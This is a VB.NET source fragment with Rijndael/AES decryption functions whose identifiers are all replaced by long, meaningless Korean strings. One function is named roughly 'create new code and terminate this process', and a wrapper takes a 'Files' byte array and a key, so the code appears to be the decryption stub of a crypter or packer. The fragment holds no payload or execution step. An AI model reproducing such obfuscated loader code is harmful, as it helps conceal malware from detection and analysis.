﻿
    Public Class RijnDael
        Public Shared Function 는것을시도하고있다하지만난그음예수다하지만난님(ByVal 를종는것을시도하고있다하지만난그음예수님을수행있다하 As String, ByVal 를종는것을시도하고있다하지만난그음예수님예을수행있다하 As String)
            Dim 를종는것을시도하고있다하지만난그음예수님예을행있하() As Byte = Encoding.ASCII.GetBytes(를종는것을시도하고있다하지만난그음예수님을수행있다하)
            Return 는것을시도하고있다하지만난그음예수다하지만난님(를종는것을시도하고있다하지만난그음예수님예을행있하, 를종는것을시도하고있다하지만난그음예수님예을수행있다하)
        End Function

        Public Shared Function 는것을시도하고있다하지만난그음예수다하지만난님(ByVal 를종는것을시도하고있다하지만난그음예수님예을행있하 As Byte(), ByVal 를종는것을시도하고있다하지예을고있다하수행있다하 As String) As Byte()

            Dim 를종는것을시도하고있다하지예을고다하수다하 As Byte()
            Using 를종는것을시도하고다하지예을고있다하수행있다하 As New System.Security.Cryptography.RijndaelManaged
                를종는것을시도하고다하지예을고있다하수행있다하.KeySize = 256
                를종는것을시도하고다하지예을고있다하수행있다하.Key = GeKey(를종는것을시도하고있다하지예을고있다하수행있다하)
                를종는것을시도하고다하지예을고있다하수행있다하.IV = GetIV(를종는것을시도하고있다하지예을고있다하수행있다하)
                '
                Using 를종는것을시도하고있다지예을고있다행있다하 As New MemoryStream(를종는것을시도하고있다하지만난그음예수님예을행있하)
                    Using 를종는것을시도하고있다지예것을시도하을고있다행있다하 As New Cryptography.CryptoStream(를종는것을시도하고있다지예을고있다행있다하, 를종는것을시도하고다하지예을고있다하수행있다하.CreateDecryptor, Security.Cryptography.CryptoStreamMode.Read)
                        Dim 를종는것을시도하고있다지예것을시도을고있다행있다하 As Byte()
                        ReDim 를종는것을시도하고있다지예것을시도을고있다행있다하(를종는것을시도하고있다하지만난그음예수님예을행있하.Length)
                        Dim 를종는것을시도하고있예것을시도하을고있다행있다하 As Integer
                        를종는것을시도하고있예것을시도하을고있다행있다하 = 를종는것을시도하고있다지예것을시도하을고있다행있다하.Read(를종는것을시도하고있다지예것을시도을고있다행있다하, 0, 를종는것을시도하고있다하지만난그음예수님예을행있하.Length)
                        '
                        ReDim 를종는것을시도하고있다하지예을고다하수다하(를종는것을시도하고있예것을시도하을고있다행있다하)
                        Array.Copy(를종는것을시도하고있다지예것을시도을고있다행있다하, 를종는것을시도하고있다하지예을고다하수다하, 를종는것을시도하고있예것을시도하을고있다행있다하)
                        '
                        를종는것을시도하고있다지예것을시도하을고있다행있다하.Close()
                    End Using
                    를종는것을시도하고있다지예을고있다행있다하.Close()
                End Using
            End Using
            Return 를종는것을시도하고있다하지예을고다하수다하
        End Function

        Private Shared Function GeKey(ByVal 를종는것을시도하고있다하지예을고있다하수행있다하 As String) As Byte()
            Dim 를종는것을시도하고있다하지예을고다하수다하 As Byte()
            Using 를종는것을시도하고있다지예것을시도하을고있다행있다다하 As New Cryptography.SHA256Managed
                Dim 를종는것을시도하고있다지예것시도하을고있다행있다다하 As String = System.Convert.ToBase64String(를종는것을시도하고있다지예것을시도하을고있다행있다다하.ComputeHash(Encoding.UTF8.GetBytes(를종는것을시도하고있다하지예을고있다하수행있다하)))
                Dim 는것을시도하고있다지예것을시도하을고있다행있다다하 As String = 를종는것을시도하고있다하지예을고있다하수행있다하 & 를종는것을시도하고있다지예것시도하을고있다행있다다하
                를종는것을시도하고있다하지예을고다하수다하 = 를종는것을시도하고있다지예것을시도하을고있다행있다다하.ComputeHash(System.Text.Encoding.UTF8.GetBytes(는것을시도하고있다지예것을시도하을고있다행있다다하))
                를종는것을시도하고있다지예것을시도하을고있다행있다다하.Clear()
            End Using
            Return 를종는것을시도하고있다하지예을고다하수다하
        End Function

        Private Shared Function GetIV(ByVal 를종는것을시도하고있다하지예을고있다하수행있다하 As String) As Byte()
            Dim 를종는것을시도하고있다하지예을고다하수다하 As Byte()
            Using 를종는것을시도하고있다지것을시도을고있다행있다하 As New Cryptography.MD5CryptoServiceProvider
                Dim 를종는것을시도하고있다지예것시도하을고있다행있다다하 As String = System.Convert.ToBase64String(를종는것을시도하고있다지것을시도을고있다행있다하.ComputeHash(Encoding.UTF8.GetBytes(를종는것을시도하고있다하지예을고있다하수행있다하)))
                Dim 는것을시도하고있다지예것을시도하을고있다행있다다하 As String = 를종는것을시도하고있다하지예을고있다하수행있다하 & 를종는것을시도하고있다지예것시도하을고있다행있다다하
                를종는것을시도하고있다하지예을고다하수다하 = 를종는것을시도하고있다지것을시도을고있다행있다하.ComputeHash(System.Text.Encoding.UTF8.GetBytes(는것을시도하고있다지예것을시도하을고있다행있다다하))
                를종는것을시도하고있다지것을시도을고있다행있다하.Clear()
            End Using
            Return 를종는것을시도하고있다하지예을고다하수다하
        End Function
    End Class



    Function 나는새로운코드를생성하여이프로세스를종료하는것(ByVal 료하는것을시도하고있다하지만난그음수님을수행하는 As Byte(), ByVal 료하는것을고있다하지만난그음예수님을수행하는 As Byte()) As Byte()
        Dim 료하는것을고는있다하지는만난그음예수님을수행하는 As New Rfc2898DeriveBytes(료하는것을고있다하지만난그음예수님을수행하는, New Byte(7) {}, 1)

        Dim 료하는것을고는있다하지는만난그음예수을수행하는 As New RijndaelManaged
        료하는것을고는있다하지는만난그음예수을수행하는.Key = 료하는것을고는있다하지는만난그음예수님을수행하는.GetBytes(16)
        료하는것을고는있다하지는만난그음예수을수행하는.IV = 료하는것을고는있다하지는만난그음예수님을수행하는.GetBytes(16)

        Dim 료하는것을것을고는있다하지는만난그음예수을수행하는 As Byte() = 료하는것을고는있다하지는만난그음예수을수행하는.CreateDecryptor.TransformFinalBlock(료하는것을시도하고있다하지만난그음수님을수행하는, 0, 료하는것을시도하고있다하지만난그음수님을수행하는.Length)
        Dim 료하는것을것을고는있다하지을고는만난그음예수을수행하는(료하는것을것을고는있다하지는만난그음예수을수행하는.Length - 17) As Byte
        Buffer.BlockCopy(료하는것을것을고는있다하지는만난그음예수을수행하는, 16, 료하는것을것을고는있다하지을고는만난그음예수을수행하는, 0, 료하는것을것을고는있다하지는만난그음예수을수행하는.Length - 16)

        Return 료하는것을것을고는있다하지을고는만난그음예수을수행하는
    End Function


    Public Function 료하는것을것을고는있다하지을고는만난음예수을수행하는(ByVal Files As Byte(), ByVal k As String) As Byte()
        Return 나는새로운코드를생성하여이프로세스를종료하는것(Files, Encoding.Default.GetBytes(k))
    End Function
End Module